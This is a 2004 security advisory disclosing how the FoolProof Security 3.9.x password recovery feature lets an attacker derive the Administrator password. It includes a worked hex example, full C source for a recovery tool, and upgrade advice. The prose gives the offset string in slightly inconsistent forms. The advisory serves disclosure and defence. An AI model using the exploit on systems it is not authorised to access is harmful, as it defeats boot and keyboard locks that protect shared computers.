CYSA-0329.txt

2004-06-09T00:00:00
ID PACKETSTORM:33503
Type packetstorm
Reporter Cyrillium Security Solutions and Services
Modified 2004-06-09T00:00:00

Description

                                        
                                            `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Cyrillium Security Advisory CYSA-0329 advisories@cyrillium.com  
http://www.cyrillium.com/ Cyrillium Security Solutions and Services  
April 29th, 2004  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
Severity: High (Password Compromise)  
  
Vendor:  
SmartStuff Software (member of Riverdeep Interactive Learning, Inc.)  
  
Affected Products:  
FoolProof Security 3.9.x for Windows 98/98SE/Me  
  
Unaffected Products:  
FoolProof Security for Macintosh  
FoolProof Security for Windows XP and Windows 2000  
  
1. Problem Description  
  
Cyrillium Security Solutions and Services has discovered a  
vulnerability  
in the password recovery feature of FoolProof Security that allows an  
attacker to recover the "Administrator" password using the "Control"  
password and password recovery key.  
  
FoolProof for Macintosh and FoolProof for Windows XP & 2000 are not  
affected because they do not support the password recovery feature.  
  
2. Details  
  
Passwords are stored as 16-byte, zero-padded ASCII strings. When  
FoolProof  
Security is installed, an "Administrator" password must be specified.  
Either the "Administrator" password or the "Control" password may be  
used  
to access the FoolProof control panel and to bypass the Bootlock and  
Keylock protection features. If the "Control" password is forgotten or  
compromised, the "Administrator" password can be used to either  
enter the  
FoolProof control panel to change the "Control" password or to  
determine  
the "Control" password from the password recovery key.  
  
The password recovery key is a 32-character hexadecimal string that  
can be  
obtained by holding down the Shift key and pressing "OK" in the  
FoolProof  
control panel's initial password dialog box. The ADMINPW.EXE program on  
the FoolProof Security installation diskette calculates the "Control"  
password from the "Administrator" password and the password recovery  
key.  
  
The ADMINPW.EXE program combines the zero-padded "Administrator"  
password  
with the password recovery key using the bitwise exclusive OR (XOR)  
operation. Next, the ASCII string "D:SKFOIK(*EHJFL" is subtracted from  
the previous result (one byte at a time). The final result is the  
"Control" password.  
  
If C represents the "Control" password, A represents the  
"Administrator"  
password, B represents the ASCII string "D:SKFOIJ(*EHJFL", and K  
represents the password recovery key, then manipulating the formula:  
C = (A xor K) - B  
yields:  
A = (C + B) xor K  
Thus, the "Administrator" password can be calculated if the "Control"  
password and password recovery key are known.  
  
The password recovery key is trivial to obtain by holding down the  
Shift  
key and pressing "OK" in the FoolProof control panel's initial password  
dialog box. If the "Control" password is compromised, the  
"Administrator"  
password can be compromised as well.  
  
Example:  
  
Administrator password is "12345":  
A = 31 32 33 34 35 00 00 00 00 00 00 00 00 00 00 00 (hexadecimal)  
Control password is "HelloWorld":  
C = 48 65 6C 6C 6F 57 6F 72 6C 64 00 00 00 00 00 00  
Recovery key (reported by FoolProof control panel):  
K = BD AD 8C 83 80 A6 B8 BC AC 8C 2A 45 48 4A 46 4C  
Offsets (constant):  
B = 44 3A 53 4B 46 4F 49 4A 40 28 2A 45 48 4A 46 4C  
  
Recovery process (ADMINPW.EXE algorithm):  
A xor K = 8C 9F BF B7 B5 A6 B8 BC AC 8C 2A 45 48 4A 46 4C  
(A xor K) - B = 48 65 6C 6C 6F 57 6F 72 6C 64 00 00 00 00 00 00  
(A xor K) - B = "HelloWorld" = Control password  
  
Reverse recovery process:  
C + B = 8C 9F BF B7 B5 A6 B8 BC AC 8C 2A 45 48 4A 46 4C  
(C + B) xor K = 31 32 33 34 35 00 00 00 00 00 00 00 00 00 00 00  
(C + B) xor K = "12345" = Administrator password  
  
The "Administrator" password can be successfully determined knowing  
only  
the "Control" password and the password recovery key.  
  
4. Exploit  
  
The following program calculates the "Administrator" password from the  
password recovery key and the "Control" password.  
  
Usage:  
  
Invoke the program with the following arguments:  
  
foolpw HEXADECIMAL_RECOVERY_KEY CONTROL_PASSWORD  
  
Example:  
  
C:\> foolpw BDAD8C8380A6B8BCAC8C2A45484A464C HelloWorld  
12345  
  
Source code:  
  
/*  
  
foolpw.c  
Copyright (C) 2004 Cyrillium Security Solutions and Services.  
  
Demonstrates a weakness in FoolProof Security password recovery system. See  
CYSA-0329 for details.  
  
CYRILLIUM SECURITY SOLUTIONS AND SERVICES DOES NOT PROVIDE ANY WARRANTY FOR  
THIS PROGRAM, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED  
TO, THE  
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  
THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH  
YOU.  
SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY  
SERVICING, REPAIR OR CORRECTION.  
  
*/  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
  
int main (int argc, char *argv[])  
{  
int i; /* Index variable */  
char a, /* Temporary variable for calculations */  
k[33], /* Recovery key in hexadecimal */  
k_array[17], /* Recovery key as array */  
c[17], /* Control password */  
*b = "D:SKFOIJ@(*EHJFL", /* Offsets */  
hex_temp[2], /* Temporary storage for hexadecimal conversion */  
*endptr; /* Output variable for strtoul */  
  
if (argc != 3)  
{  
puts ("Usage: foolpw RECOVERY_KEY CONTROL_PASSWORD");  
return 1;  
}  
if (strlen (argv[1]) != 16*2)  
{  
puts ("Recovery key must be 16 hexadecimal bytes (32 characters)");  
return 1;  
}  
if (strlen (argv[2]) > 16)  
{  
puts ("Passwords are limited to 16 characters");  
return 1;  
}  
memset (k, 0, sizeof (b));  
memset (k_array, 0, sizeof (b));  
memset (c, 0, sizeof (c));  
memset (hex_temp, 0, sizeof (hex_temp));  
strcpy (k, argv[1]);  
strcpy (c, argv[2]);  
  
for (i = 0; i < 16; i++)  
{  
memcpy (hex_temp, &k[i*2], 2);  
k_array[i] = strtoul (hex_temp, &endptr, 16);  
if (*endptr != '\0')  
{  
printf("\nInvalid hexadecimal character \'%c\'\n", *endptr);  
return 1;  
}  
a = (c[i] + b[i]) ^ k_array[i];  
putc (a, stdout);  
}  
puts ("");  
return 0;  
}  
  
5. Solution  
  
Users who know the "Administrator" password can enter the FoolProof  
control panel and bypass Bootlock/Keylock on any computer that has the  
same "Administrator" password as the compromised computer. To change  
the  
"Administrator" password, FoolProof Security must be reinstalled.  
  
Upgrading to FoolProof Security 4.0 or higher is recommended because  
the  
password recovery feature has been removed. However, FoolProof versions  
4.0 and higher do not support Windows 95, Windows 98, or Windows Me.  
  
Remember to read the uninstallation and upgrade instructions before  
upgrading FoolProof Security, especially if you are using  
Bootlock/Keylock. Improper uninstallation or upgrading could cause your  
computer to fail to boot.  
  
6. References  
  
1. SmartStuff Software: <http://www.smartstuff.com/>  
2. Riverdeep Interactive Learning, Inc.: <http://www.riverdeep.net>  
  
7. Copyright  
  
Copyright (C) 2004 Cyrillium Security Solutions and Services. All  
rights  
reserved. Permission is granted to redistribute unmodified copies of  
this advisory.  
  
`